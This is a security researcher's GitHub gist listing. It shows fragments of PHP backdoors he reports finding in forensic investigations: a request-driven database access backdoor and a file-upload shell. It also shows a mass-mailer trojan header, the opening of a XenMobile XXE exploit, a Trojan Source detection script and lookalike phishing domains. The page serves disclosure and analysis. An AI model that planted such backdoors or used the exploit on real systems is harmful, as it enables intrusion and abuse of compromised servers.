Skip to content

Instantly share code, notes, and snippets.

View jonaslejon's full-sized avatar
:octocat:
Working from home

Jonas Lejon jonaslejon

:octocat:
Working from home
411 followers · 41 following
View GitHub Profile
@jonaslejon
jonaslejon / t44.php
Created September 25, 2015 12:06
WordPress backdoor user. Found duing forensic investigation
<?php
error_reporting(0);
if(isset($_GET['check']))
{
echo "pawet";
}
if(isset($_REQUEST["v1"]))
{
$link = mysql_connect($_REQUEST["v1"], $_REQUEST["v2"], $_REQUEST["v3"]);
$query = "SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema NOT IN ( 'information_schema', 'performance_schema', 'mysql' )";
@jonaslejon
jonaslejon / PHP-cookie-backdoor.php
Last active February 27, 2023 05:10
This is a PHP COOKIE backdoor that was found during a forensic investigation
@jonaslejon
jonaslejon / custom.list.chroot
Last active February 21, 2023 14:13
My custom Kali Linux package list for building the live ISO
python-usb
python3-usb
mingw-w64
isc-dhcp-server
bridge-utils
libdbus-1-dev
libdbus-glib-1-dev
python3-venv
dirbuster
cmake
@jonaslejon
jonaslejon / php-mass-mailer.php
Created March 17, 2015 09:01
PHP Mass Mailer
<?php
/*
The code below was found during a forensic investigation. It seems to be a mass mailer that is using the PHPMailer class to send mail
from compromised web hosting providers.
The "password" is 5307c392-ad5e-4909-adec-c9fd12572686, see below.
Investigation was made by Jonas Lejon <jonas.githubgist at- triop.se>
The signature for PHP.Trojan.Mailer-1 can only find the packed version of this file.
@jonaslejon
jonaslejon / file-upload.php
Created February 10, 2016 20:19
PHP file upload backdoor
<?php
$self = $_SERVER['PHP_SELF'];
$docr = $_SERVER['DOCUMENT_ROOT'];
$sern = $_SERVER['SERVER_NAME'];
$tend = "</tr></form></table><br><br><br><br>";
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
else {$ac = "upload";}
switch($ac) {
case "upload":
@jonaslejon
jonaslejon / find.sh
Created November 3, 2021 07:14
Find Trojan Source unicode characters (CVE-2021-42694 and CVE-2021-42574.)
#/bin/sh
# Usage instructions: sh find.sh php|tr '\n' '; '
# Then copy and paste the output and execute it
ext=$1
C="\u200E \u200F \u202A \u202B \u202C \u202D \u202E \u2066 \u2067 \u2068 \u2069 \u202C"
for a in $C; do echo find . -type f -name \"*.$ext\" -exec grep -H \$\'$a\' {} \\\; ; done
@jonaslejon
jonaslejon / postnord.txt
Created March 7, 2022 18:11
.com domains starting with postnord
$ zgrep ^postnord 2022-02-07-com.zone.gz|awk '{print $1}'|sort -u
postnord-22.com.
postnord-delivery.com.
postnord-dk-post.com.
postnord-dk.com.
postnord-epostal.com.
postnord-logistics.com.
postnord-nestle.com.
postnord-no.com.
postnord-norway.com.
@jonaslejon
jonaslejon / wpsec.php
Created February 24, 2022 18:31
WPSec.com PHP API
<?php
// Fetches a temporary access_token Bearer
// Replace the client_secret and client_id below
$curl = curl_init();
curl_setopt_array($curl, array(
CURLOPT_URL => 'https://api.wpsec.com/oauth/token',
CURLOPT_RETURNTRANSFER => true,
CURLOPT_ENCODING => '',
@jonaslejon
jonaslejon / xenxxe.py
Last active September 9, 2021 06:07
Citrix XenMobile XXE Exploit
#!/usr/bin/python3
##
## PoC test for the XXE security vulnerability CVE-2018-10653 in XenMobile Server 10.8 before RP2 and 10.7 before RP3
##
## This PoC was written by Jonas Lejon 2019-11-28 <jonas.xenmobile@triop.se> https://triop.se
## Reported to Citrix 2017-10, patch released 2018-05
##
import requests
import sys
@jonaslejon
jonaslejon / Mailgun PHP API with curl
Last active July 31, 2021 21:29
Send mail with Mailgun API version 2 and PHP. Should also work with version 3 of the Mailgun API
define("DOMAIN", "test.se");
define("MAILGUN_API", "XXX123"); // Mailgun Private API Key
function br2nl($string) {
return preg_replace('/\<br(\s*)?\/?\>/i', "\n", $string);
}
function mg_send($to, $subject, $message) {
$ch = curl_init();